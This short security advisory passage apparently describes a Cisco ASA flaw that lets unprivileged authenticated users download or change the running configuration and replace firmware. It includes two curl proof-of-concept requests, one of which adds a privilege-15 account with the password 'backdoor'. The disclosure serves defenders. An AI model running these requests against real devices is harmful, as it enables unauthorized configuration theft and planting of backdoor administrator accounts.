Description
Analysis
When command authorization is not enabled, an authenticated remote unprivileged (level 0 or 1) user can change or download the running configuration as well as upload or replace the appliance firmware. Downgrading appliance firmware to an older version would allow an attacker to leverage known vulnerabilities that have been well researched or have publicly available exploit modules.
A simple proof of concept for downloading the running configuration follows:
curl --basic -u notadmin -p -k http:///admin/system/running-config
The following proof of concept allows an unprivileged user to add a new privileged user to the running configuration:
curl --basic -u notadmin -p -k -X “POST” --data-binary “username fourthuser password backdoor privilege 15” “http:///admin/config”
According to Cisco “This vulnerability affects Cisco ASA Software that is running on any Cisco product that has web management access enabled.”